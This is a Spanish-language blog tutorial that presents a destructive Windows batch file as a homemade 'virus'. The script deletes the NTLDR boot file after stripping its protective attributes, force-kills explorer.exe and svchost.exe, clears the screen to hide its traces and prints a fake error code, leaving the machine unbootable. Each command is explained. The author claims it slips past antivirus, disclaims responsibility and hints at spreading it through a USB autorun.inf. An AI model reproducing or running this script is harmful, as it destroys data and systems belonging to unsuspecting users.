Crear un virus en sistemas operativos Windows es más fácil de lo que pensáis, aunque en la actualidad con los sistemas operativos modernos se ha fortalezido bastante el tema de la seguridad nunca es suficiente… os prometo que hay muchas maneras de hacerlos sin que el antivirus se de cuenta. Un claro ejemplo es utilizando un archivo batch, este método es muy antiguo ya que incluso en las primeras versiones de MS-DOS se utilizaban para realizar instalaciones de programas… hoy en día en Windows siguen presentes aunque de una forma “más” segura 🙂

 

 

Que quede claro que mi intención no es que vayáis por ahí cargándose los equipos de la gente, empresas y demás que os conozco… y cómo no podía ser de otra forma los daños provocados por la ejecución del script o por el intento… NO me hago responsable!! cada uno sois conscientes de lo que estáis haciendo y que el equipo quedará inservible a no ser que se reponga el archivo o se formatee.

 

Empezamos… Cabe destacar que este “virus” solamente es funcional en Windows 2000, Windows XP y Windows 2003 aunque con alguna modificación es posible aplicarlo a Vista y 7, básicamente lo que hace el archivo de procesamiento por lotes es eliminar el archivo ntldr que es necesario para que Windows arranque correctamente (los sistemas NT 5.X) y al no estar protegido con ningún sistema de permisos es realmente fácil eliminarlo al aplicar este “virus” el equipo no iniciará mostrando un mensaje “Falta NTLDR

 

Veamos cómo hacerlo:  El código es el siguiente y debemos meterlo en un archivo.bat se puede hacer con cualquier editor de texto simple como el bloq de notas

@echo off
color 06
attrib -r -h -s %root:C:\ntldr
DEL /f /q "C:\ntldr"
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
cls
echo  error #800889xC888
exit

 

Lo que hacemos en esta línea es cambiar los atributos de este archivo para que podamos eliminarlo con el comando DEL

attrib -r -h -s %root:C:\ntldr

 

El comando DEL con los parámetros f y q lo que hace es eliminar el archivo ntldr forzando su eliminación y evitando que pregunte si quieres eliminarlo

DEL /f /q "C:\ntldr"

 

Seguidamente para que el efecto sea instantáneo lo que hacemos es “matar” varios procesos críticos del sistema, provocando con esto que el equipo se desestabilice y sea reiniciado sin poder hacer nada

taskkill /f /im explorer.exe
taskkill /f /im svchost.exe

Las siguientes lineas son para limpiar el contenido rápidamente y que el usuario no le de tiempo de ver que archivos han sido eliminados.

Este es el virus cree hace algún tiempo y decidido compartirlo con todo el mundo, no es que sea nada del otro mundo pero como curiosidad pues está bien. Aunque esto combinado con un autorun.inf en un pendrive la podéis liar y bien… pero no os quiero dar ideas 😉